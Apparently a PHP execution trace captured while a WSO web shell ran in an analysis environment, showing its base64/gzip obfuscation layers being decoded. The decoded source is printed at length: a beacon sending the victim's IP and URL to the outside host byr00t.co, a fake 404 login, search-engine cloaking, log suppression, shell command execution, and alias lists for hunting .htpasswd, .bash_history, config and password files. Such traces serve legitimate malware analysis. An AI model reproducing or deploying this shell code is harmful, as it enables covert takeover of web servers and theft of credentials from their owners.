4	19	R			TRUE
4	20	0	0.008193	1143864	curl_init	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008215	1144776
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008244	1144776	curl_setopt	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4	21	1	0.008265	1144872
4	21	R			TRUE
4	22	0	0.008278	1144776	curl_setopt	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008294	1144872
4	22	R			TRUE
4	23	0	0.008307	1144776	curl_exec	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.055260	1144808
4	23	R			''
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.055321	1144776	curl_close	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.055390	1143920
4	24	R			NULL
4	25	0	0.055408	1143888	file_get_contents	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA='
4	25	1	0.662387	1147584
4	25	R			''
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.662501	1147544	define	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso.php(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.662548	1147648
4	26	R			TRUE
4	27	0	0.662564	1147576	strpos	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.662606	1147648
4	27	R			FALSE
4	28	0	0.662629	1147576	session_start	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.662698	1148328
4	28	R			TRUE
4	29	0	0.662714	1148328	error_reporting	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.662728	1148368
4	29	R			0
4	30	0	0.662742	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.662758	1148400
4	30	R			''
4	31	0	0.662771	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.662786	1148400
4	31	R			''
4	32	0	0.662798	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.662812	1148400
4	32	R			'1'
4	33	0	0.662825	1148328	ini_set	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.662841	1148432
4	33	R			'30'
4	34	0	0.662853	1148328	set_time_limit	0		/var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.662868	1148392
4	34	R			FALSE
3	12	1	0.662890	1149824
2	7	1	0.662907	1062800
1	3	1	0.662915	1061224
1	35	0	0.662922	1061256	Error->__toString	0		Unknown	0	0
2	36	0	0.662934	1061336	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.662946	1061592
2	36	R			'#0 /var/www/html/uploads/wso.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso.php(4): eval()\n#2 {main}'
1	35	1	0.662966	1065728
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso.php(4): eval()\n#2 {main}'
			0.663017	986224
TRACE END   [2023-02-12 22:59:58.609456]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676256279.2748.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:45:05.172639]
1	0	1	0.000188	393528
1	3	0	0.000426	426944	{main}	1		/var/www/html/uploads/wso1.php.PDF	0	0
1		A						/var/www/html/uploads/wso1.php.PDF	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso1.php.PDF	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000508	426944	base64_decode	0		/var/www/html/uploads/wso1.php.PDF	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000528	427104
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000550	427072	gzinflate	0		/var/www/html/uploads/wso1.php.PDF	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000574	427200
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000592	427040	htmlspecialchars_decode	0		/var/www/html/uploads/wso1.php.PDF	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000610	427072
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000638	428600	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso1.php.PDF	4	0
3	8	0	0.000655	428600	strrev	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3	8	1	0.000708	461400
3	8	R			'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	0	0.000754	461368	base64_decode	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	1	0.000869	494168
3	9	R			'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	0	0.001317	461368	gzinflate	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	1	0.001767	485976
3	10	R			'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	0	0.002215	453176	gzuncompress	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	1	'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	1	0.002922	539224
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005737	1143856	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ 